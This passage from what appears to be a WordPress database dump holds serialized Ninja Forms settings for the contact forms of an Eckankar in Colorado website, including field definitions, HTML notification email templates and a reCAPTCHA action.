first\";s:10:\"manual_key\";b:0;s:11:\"custom_mask\";s:0:\"\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";}}i:134;a:1:{s:8:\"settings\";a:50:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:3;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"lastname\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:1:\"7\";s:5:\"label\";s:9:\"Last Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:12:\"lastname_269\";s:11:\"field_label\";s:9:\"Last Name\";s:9:\"field_key\";s:12:\"lastname_269\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:9:\"one-third\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}}i:135;a:1:{s:8:\"settings\";a:50:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:4;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:5:\"email\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:2:\"14\";s:5:\"label\";s:5:\"Email\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_phone\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:9:\"email_270\";s:11:\"field_label\";s:5:\"Email\";s:9:\"field_key\";s:9:\"email_270\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:9:\"one-third\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}}i:136;a:1:{s:8:\"settings\";a:18:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:5;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:2:\"hr\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:2:\"hr\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:6:\"hr_273\";s:11:\"field_label\";s:2:\"hr\";s:9:\"field_key\";s:6:\"hr_273\";s:15:\"container_class\";s:0:\"\";}}i:137;a:1:{s:8:\"settings\";a:51:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:6;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:7:\"textbox\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:15:\"Message Subject\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:11:\"placeholder\";s:0:\"\";s:10:\"first_name\";s:0:\"\";s:9:\"last_name\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:21:\"user_info_field_group\";s:1:\"1\";s:13:\"disable_input\";s:1:\"0\";s:4:\"mask\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"datepicker\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:11:\"textbox_303\";s:11:\"field_label\";s:15:\"Message Subject\";s:9:\"field_key\";s:11:\"textbox_303\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:10:\"manual_key\";b:0;s:11:\"custom_mask\";s:0:\"\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}}i:138;a:1:{s:8:\"settings\";a:35:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:7;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"textarea\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:23:\"Enter Your Message Here\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:13:\"default_value\";s:0:\"\";s:12:\"textarea_rte\";s:1:\"0\";s:14:\"textarea_media\";s:1:\"0\";s:18:\"disable_rte_mobile\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:17:\"calc_auto_include\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:3:\"key\";s:12:\"textarea_276\";s:11:\"field_label\";s:23:\"Enter Your Message Here\";s:9:\"field_key\";s:12:\"textarea_276\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:10:\"manual_key\";b:0;s:5:\"value\";s:0:\"\";}}i:139;a:1:{s:8:\"settings\";a:22:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:8;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:4:\"Text\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:13:\"default_value\";s:147:\"Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.\";s:7:\"desc_el\";s:3:\"div\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:7:\"default\";s:147:\"Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.\";s:3:\"key\";s:8:\"html_305\";s:11:\"field_label\";s:4:\"Text\";s:9:\"field_key\";s:8:\"html_305\";s:15:\"container_class\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}}i:624;a:1:{s:8:\"settings\";a:11:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:9;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:4:\"HTML\";s:4:\"type\";s:4:\"html\";s:7:\"default\";s:197:\"This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:18:\"html_1663798083380\";}}i:141;a:1:{s:8:\"settings\";a:21:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:10;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:6:\"submit\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:6:\"Submit\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:16:\"processing_label\";s:10:\"Processing\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:10:\"submit_278\";s:11:\"field_label\";s:6:\"Submit\";s:9:\"field_key\";s:10:\"submit_278\";s:15:\"container_class\";s:0:\"\";}}}s:7:\"actions\";a:5:{i:49;a:1:{s:8:\"settings\";a:31:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:45:44\";s:5:\"label\";s:9:\"Save Form\";s:9:\"parent_id\";s:2:\"13\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";}}i:50;a:1:{s:8:\"settings\";a:28:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"0\";s:10:\"created_at\";s:19:\"2018-01-03 11:45:44\";s:5:\"label\";s:17:\"Send copy to user\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:9:\"from_name\";s:20:\"Eckankar In Colorado\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:17:\"{field:email_270}\";s:13:\"email_subject\";s:38:\"Western Slope Leadership Communication\";s:13:\"email_message\";s:4984:\"<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"bodyTable\"><br /><br />\r\n    <tr><br /><br />\r\n        <td align=\"center\" valign=\"top\"><br /><br />\r\n            <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"800\" id=\"emailContainer\"><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"left\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"emailHeader\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left<br /><br />\r\n                                \" valign=\"top\" style=\"background-color:#ebebeb;padding-left:10px;color:#23507d;line-height: 80%\"><br /><br />\r\n                                    <h1>Eckankar In Colorado</h1> <br /><br />\r\n                                </td><br /><br />\r\n                                <br /><br />\r\n                                <br /><br />\r\n                                <td></td><br /><br />\r\n                                <br /><br />\r\n                                <br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"center\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailBody\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left\" valign=\"top\"><br /><br />\r\n                                   <p><strong>Hello {field:textbox_268},</strong><br /><br />\r\n                                  </p><br /><br />\r\n                                  <p>You have created a new form submission on the Eckankar In Colorado website.                                      Your submission is requesting contact with a person on the \"Western Slope Leadership Communication\" team.</p><br /><br />\r\n                              <p>Here is a copy of the information that you have submitted: </p></td><br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                          <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailHeader\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left<br /><br />\r\n                                \" valign=\"top\" style=\"background-color:#ebebeb;padding:10px;border: 1px solid #cccccc\"><br /><br />\r\n                                    <p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_268}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_269}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_270}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> [ninja_forms_field id=271]</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> [ninja_forms_field id=272]<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> [ninja_forms_field id=275]</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>ENTER YOUR MESSAGE: </strong>{field:textarea_276}</span></p><br /><br />\r\n                                </td><br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"center\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailFooter\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n                                  Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color:#23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n  <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em><br /><br />\r\n                                </p></td><br /><br />\r\n                            </tr><br /><br />\r\n                            <br /><br />\r\n                            <br /><br />\r\n                        </table><br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n            </table><br /><br />\r\n        </td><br /><br />\r\n    </tr><br /><br />\r\n</table><br /><br />\r\n\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:9:\"parent_id\";s:2:\"13\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";}}i:51;a:1:{s:8:\"settings\";a:34:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:45:44\";s:5:\"label\";s:15:\"Success Message\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:361:\"<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p>\n</div>\";s:9:\"parent_id\";s:2:\"13\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:14:\"drawerDisabled\";s:0:\"\";}}i:52;a:1:{s:8:\"settings\";a:28:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:45:44\";s:5:\"label\";s:11:\"Admin Email\";s:12:\"date_updated\";s:10:\"2016-01-19\";s:9:\"from_name\";s:33:\"Eckankar In Colorado Contact Form\";s:12:\"from_address\";s:29:\"contact@eckankar-colorado.org\";s:2:\"to\";s:31:\"webmaster@eckankar-colorado.org\";s:13:\"email_subject\";s:43:\"ECK Colorado Website - Form Record Received\";s:13:\"email_message\";s:3501:\"<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello! You have a new \"Eckankar in Colorado Contact\" form submission.<br /><br /><br />\r\n</strong><br /><br /><br />\r\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as the contact to receive these messages.</p><br /><br />\r\n<p>The following person has requested contact. Here is the information that <strong><span style=\"color: #333333\">{field:textbox_268}</span></strong> has submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_268}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_269}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_270}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>MESSAGE SUBJECT:</strong> {field:textbox_303}</span><br /><br /><br />\r\n <br /><br /><br />\r\n<span style=\"color: #333333\"><strong>ENTER YOUR MESSAGE: </strong>{field:textarea_276}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:9:\"parent_id\";s:2:\"13\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";}}i:240;a:1:{s:8:\"settings\";a:29:{s:5:\"title\";N;s:3:\"key\";N;s:4:\"type\";s:9:\"recaptcha\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2022-09-20 09:08:36\";s:5:\"label\";s:12:\"reCAPTCHA v3\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:2:\"to\";s:16:\"{wp:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";s:12:\"redirect_url\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:7:\"message\";s:170:\"This action adds users to WordPress&#039; personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site&#039;s front end.\";s:5:\"score\";s:3:\"0.5\";s:14:\"drawerDisabled\";b:0;}}}}'),(3633,15,'wpcl_nf_form_preview_12','a:4:{s:2:\"id\";i:12;s:8:\"settings\";a:42:{s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";b:1;s:5:\"title\";s:42:\"Colorado Springs Leadership Communications\";s:10:\"created_at\";s:19:\"2019-07-15 14:05:38\";s:10:\"form_title\";s:42:\"Colorado Springs Leadership Communications\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"show_title\";s:1:\"0\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:12:\"date_updated\";s:19:\"2017-07-04 18:14:18\";s:6:\"status\";s:0:\"\";s:11:\"append_page\";s:0:\"\";s:4:\"ajax\";s:1:\"0\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:8:\"last_sub\";s:1:\"2\";s:10:\"conditions\";a:0:{}s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:0:\"\";s:10:\"add_submit\";s:1:\"1\";s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:13:{i:0;s:7:\"html_32\";i:1;s:10:\"textbox_33\";i:2;s:11:\"lastname_34\";i:3;s:8:\"email_35\";i:4;s:8:\"phone_36\";i:5;s:13:\"listselect_37\";i:6;s:5:\"hr_38\";i:7;s:7:\"html_39\";i:8;s:13:\"listselect_40\";i:9;s:11:\"textarea_41\";i:10;s:18:\"html_1663801397261\";i:11;s:9:\"submit_43\";i:12;s:18:\"html_1663801395614\";}s:17:\"allow_public_link\";i:0;s:10:\"embed_form\";s:0:\"\";s:19:\"changeEmailErrorMsg\";s:0:\"\";s:18:\"changeDateErrorMsg\";s:0:\"\";s:20:\"confirmFieldErrorMsg\";s:0:\"\";s:22:\"fieldNumberNumMinError\";s:0:\"\";s:22:\"fieldNumberNumMaxError\";s:0:\"\";s:22:\"fieldNumberIncrementBy\";s:0:\"\";s:23:\"formErrorsCorrectErrors\";s:0:\"\";s:21:\"validateRequiredField\";s:0:\"\";s:21:\"honeypotHoneypotError\";s:0:\"\";s:20:\"fieldsMarkedRequired\";s:0:\"\";s:14:\"drawerDisabled\";b:0;s:20:\"repeatable_fieldsets\";s:0:\"\";s:24:\"form_title_heading_level\";s:1:\"3\";}s:6:\"fields\";a:13:{i:120;a:1:{s:8:\"settings\";a:20:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:1;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:4:\"Text\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:13:\"default_value\";s:201:\"<h3><span style=\"color: #23507d;\"><strong><span 